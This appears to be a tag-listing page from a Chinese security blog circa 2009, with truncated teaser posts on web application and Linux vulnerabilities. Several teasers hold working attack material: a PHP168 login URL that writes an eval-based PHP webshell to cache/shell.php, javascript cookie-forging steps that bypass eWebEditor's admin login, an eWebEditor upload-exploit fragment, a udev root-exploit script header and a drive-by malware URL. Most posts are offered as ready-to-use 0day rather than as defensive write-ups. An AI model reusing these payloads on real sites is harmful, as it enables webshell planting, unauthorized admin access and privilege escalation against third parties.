Tag: 漏洞预览模式: 普通 | 列表

Fckeditor的一些漏洞总结

Fckeditor版本多..支持很多语言..所以本文不针对任何版本或者什么语言.只讲利用方法

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.Asp

当你知道fckeditor目录时..你输入以上地址..就会看到有个上传的地方..如图所示:

查看更多...

Tags: Fckeditor 漏洞

分类:技术转载 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2339

PHP168 6.0及以下版本漏洞

影响版本:PHP168 6.0以下版本
入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限.
测试语句:
login.php?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache&content=<?php%20@eval($_POST[a]);?>
shell地址:cache/shell.php

查看更多...

Tags: php168 漏洞 shell

分类:0day | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 940

BDATuner.MPEG2TuneRequest新漏洞

发现日期:2009-7-4

被挂马网站: 8oy4t.8866.org
挂马页: hxxp://8oy4t.8866.org/aa/go.jpg
漏洞名: BDATuner.MPEG2TuneRequest Stack Overflow Exploit

查看更多...

Tags: 0day 漏洞 网马

分类:0day | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 1464

php版ewebeditor 3.8的漏洞

php版ewebeditor 3.8的漏洞
php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道,在这里我说说利用方法:

1 首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了,必须是出错的时候,然后这时候你清空浏览器的url,然后输入javascript:alert(document.cookie=”adminuser=”+escape(”admin”));javascript:alert(document.cookie=”adminpass=”+escape(”admin”));javascript:alert(document.cookie=”admindj=”+escape(”1″));后三次回车,
2 然后输入正常情况才能访问的文件../ewebeditor/admin/default.php就可以进后台了

查看更多...

Tags: ewebeditor php 漏洞 eweb

分类:0day | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1174
影响版本:DVBBS 8.0.0-8.2.0

漏洞分析:
文件show.asp中:
filetype=Request("filetype") //第75行

查看更多...

Tags: 动网 dvbbs 跨站 漏洞

分类:技术转载 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 814

Bo-Blog 2.0.3  注射漏洞

详情看这篇文章http://bbs.wolvez.org/topic/77/
现在用个人blog的人越来越多,
一个blog程序发现漏洞 就以为着一群人跟着受苦
上次pj的那洞还好我补的早。。。不然我也完蛋
一个小号QQ给我发了条信息。。。

查看更多...

Tags: Bo-Blog 注射 漏洞

分类:0day | 固定链接 | 评论: 2 | 引用: 0 | 查看次数: 757

eweb的些漏洞 方便自己查阅

eWebEditor是基于浏览器的、 所见即所得的在线HTML编辑器。她能够在网页上实现许多桌面编辑软件(如:Word)所具有的强大可视编辑功能。 WEB开发人员可以用她把传统的多行文本输入框<TEXTAREA>替换为可视化的富文本输入框,使最终用户可以可视化的发布HTML格式的 网页内容。eWebEditor!已基本成为网站内容管理发布的必备工具!

最新的ewebeditor asp版 2.1.6 上传漏洞,由于Upload.asp过滤不严,可以直接引起上传漏洞,奉送代码:

<H1>ewebeditor asp版 2.1.6 上传漏洞利用程序----by <a href=http://hi.baidu.com/乔3少>乔3少</a></H1><br><br>

查看更多...

Tags: eweb 漏洞 iis

分类:技术转载 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1368

苹果茶注册漏洞

苹果, 注册
“苹果茶”是一款内网建站的小软件,对于了解内网建站的朋友应该听说过吧,只要我们在本机上安装它就可以实现别人通过WEB访问我们的结果,我们可以通过此进行内网上线,由于此软件的功能强大,绿色小巧……得到了国内网民的热烈欢迎,短时间内注册和下载人数不断上升,后来让人们没有想到的是“苹果茶”官网竟然禁止了新用户注册!
导致很多人没来得及注册,因此少了一种内网上线的方式!

下面就是注册可以正常注册的访问页面 是个BUG 这个BUG一定很快会被官方的人发现 要注册的人赶快了

查看更多...

Tags: 漏洞 苹果茶 注册

分类:技术转载 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1101

Linux爆本地提权漏洞 请立即更新udev程序

新闻来源:milw0rm.com
Linux的udev程序再爆本地提权漏洞,本地用户可以轻易获得root权限,请立即更新udev程序。(2.4内核系统不受影响)
修复方法(修复前请备份重要数据):

查看更多...

Tags: Linux UDEV 提权 本地提权 漏洞

分类:Linux相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 852

udev,linux有史以来最危险的本地安全漏洞

通杀X86和X64架构下N个发行版的N个大版本和子版本,影响面相当大,互联网的血雨腥风即将到来。

这个漏洞对各大企业的安全人员发起挑战,我们的软件资产管理系统是否有足够的数据支撑我们做下面的事情?

1、给哪些系统打补丁?

查看更多...

Tags: Linux UDEV 提权 本地提权 漏洞

分类:Linux相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 816

讯时网站管理系统漏洞

讯时网站管理系统漏洞

作者:xk8888888

这套系统有N年版,一般的政府、学校和企事业单位用得多,

查看更多...

Tags: 漏洞 管理

分类:0day | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1706

Linux Kernel 2.6 UDEV 本地提权

#!/bin/sh
# Linux 2.6
# bug found by Sebastian Krahmer
#
# lame sploit using LD technique

查看更多...

Tags: Exploit Linux UDEV 提权 本地提权 漏洞

分类:Linux相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1256

VMware曝漏洞:Windows虚拟机可攻击Mac主机

一位安全研究人员今天表示,虚拟化软件VMware的Mac版本Fusion中存在一个严重安全漏洞,这是Mac用户的噩梦,因为利用该漏洞可以通过Windows虚拟机在Mac主机上执行恶意代码,所幸VMware已经发布了Fusion 2.0.4修复了该漏洞.Immunity公司的研究人员Kostya Korchinsky表示,VMware虚拟机显示功能中的一个严重漏洞可以被用来在主机操作系统上读取和写入内存,Korchinsky制作了一个视频 演示了利用该漏洞对主机系统进行攻击(http://www.immunityinc.com/documentation/cloudburst- vista.html),演示中,主机运行Vista SP1,虚拟机运行Windows XP.

  在今天的一封Email中,Korchinsky说:“这确实是一种虚拟机对主机的攻击,它利用VMware中显示功能的一些漏洞在主机上任意读取和写入内存,也就是说虚拟机可以有效绕过Vista SP1上的ASLR和DEP而在主机上运行代码.”

  同样的方法适用于运行Mac OS X的主机,Korchinsky表示:“同样的漏洞存在于Fusion中,运行Windows或Linux的虚拟机也可以利用该漏洞在Mac OS X主机上执行任意代码.”

查看更多...

Tags: VMware 漏洞 主机 mac 虚拟机

分类:新闻琐事 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 896

Diggcms所有版本通杀漏洞

官方如果看到请不要责怪 谢谢!

程序很不错 后台强大 全站生成html 如果在美观上加强一点是个很不错的程序

对于这个系统 以前分析过 在dig_vote.wst 里存在注入漏洞 但是这个页面包含了

查看更多...

Tags: 0day 漏洞 版本 cookie 管理

分类:0day | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 537